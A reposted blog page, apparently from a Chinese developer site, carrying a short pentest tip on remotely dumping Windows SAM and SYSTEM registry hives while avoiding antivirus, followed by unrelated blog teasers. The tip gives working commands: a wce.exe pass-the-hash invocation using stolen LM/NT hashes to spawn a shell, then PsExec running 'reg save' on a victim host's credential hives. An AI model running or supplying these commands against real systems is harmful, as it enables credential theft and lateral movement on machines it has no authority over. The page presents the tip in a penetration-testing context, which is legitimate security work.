文档章节

Remotely Dump SAM/SYSTEM Files & Avoid A/V

Cnlouds
 Cnlouds
发布于 2013/08/27 23:38
字数 160
阅读 59
收藏 0

This command came in very handy on a recent pentest. Essentially this allows us to dump out the SAM and SYSTEM files on a compromised host, whilst also helping avoid A/V. It should be noted that this is a post exploitation task and assumes you have SYSTEM access to the host/or are using a privileged hash to authenticate from a remote system.

If you wish to perform this attack remotely you’ll need the relevant hash and wce to perform the following command:

wce.exe -s administrator:500:LMHASH:NTHASH -c cmd.exe

Then in the spawned window you can use the following:

PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION% & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%

If you have local access you can obviously drop the wce and psexec sections.

If you have any issues accessing ADMIN$ etc you can always use the reg hack as described in a previous post.

本文转载自:http://www.rebootuser.com/?p=1457

Cnlouds
粉丝 13
博文 95
码字总数 56136
作品 0
海淀
程序员
私信 提问
oracle物理结构

不对之处请多多指教: Oracle的物理结构(window)下: @控制文件: 存储实例、数据文件及日志文件等信息的二进制文件。alter system set controlfiles=‘路径’。V$CONTROLFILE。 @数据文件: 存储...

noteman
2015/09/21
10
0
mysqlbinlog 使用

示例: 1、从远程服务器 读取 数据库test 开始时间 2017-09-26 12:05:00' 的binlog mysqlbinlog -uroot -p123456 -h192.168.1.100 -R -d test --start-datetime='2017-09-26 12:05:00' --ba......

Love轩轩
2017/09/26
0
0
esx无法删除lun处理

参考文档Cannot remove datastore * because file system is busy.时间 2014-02-04 03:40:33 Virten原文 http://www.virten.net/2014/02/cannot-remove-datastore-because-file-system-is-b......

神奇南瓜
2017/12/10
0
0
MAX_DUMP_FILE_SIZE参数:限制trace files及alert file大小

有一AIX平台上的oracle产生一个大小为10G+的数据库日志跟踪文件,以致ORACLE安装目录充满,新的用户请求被拒绝,影响服务。 反思:加强监控手段。 MAXDUMPFILE_SIZE参数默认为unlimited,如果...

rudy_gao
2014/07/11
0
0
js引入另外一个js

The old versions of JavaScript had no import, include, or require, so many different approaches to this problem have been developed. But recent versions of JavaScript have stand......

sd19871122
2017/12/01
0
0

没有更多内容

加载失败,请刷新页面

加载更多

探讨android更新UI的几种方法

作为IT新手,总以为只要有时间,有精力,什么东西都能做出来。这种念头我也有过,但很快就熄灭了,因为现实是残酷的,就算一开始的时间和精力非常充足,也会随着项目的推进而逐步消磨殆尽。我...

天王盖地虎626
40分钟前
1
0
浙江易柏生物技术有限公司年产200万份高危型HPV分型检测试剂盒、200万份高危型HPVE6-E7mRNA荧光检测试剂盒生产线项目环境影响评价公告信息

浙江易柏生物技术有限公司年产200万份高危型HPV分型检测试剂盒、200万份高危型HPVE6-E7mRNA荧光检测试剂盒生产线项目环境影响评价公告信息 一、建设项目基本情况 项目名称:年产200万份高危型...

miaojiangmin
今天
3
0
nproc systemd on CentOS 7

Increasing nproc for processes launched by systemd on CentOS 7 Ask Question I have successfully increased the nofile and nproc value for the local users, but I couldn't find a p......

MtrS
今天
5
0
了解微信小程序下拉刷新功能

小程序提供了这个事件。 onPullDownRefresh() 监听用户下拉刷新事件。 如果要开启下拉刷新功能,要先到json配置: "enablePullDownRefresh":true 配置后下拉有反应了但是没有加载效果,在onP...

oixxan__
今天
2
0
springmvc java对象转json,上传下载(未完)拦截器Interceptor以及源码解析(未完待续)

package com.atguigu.my.controller;import java.util.Collection;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.stereotype.Contr......

architect刘源源
今天
34
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部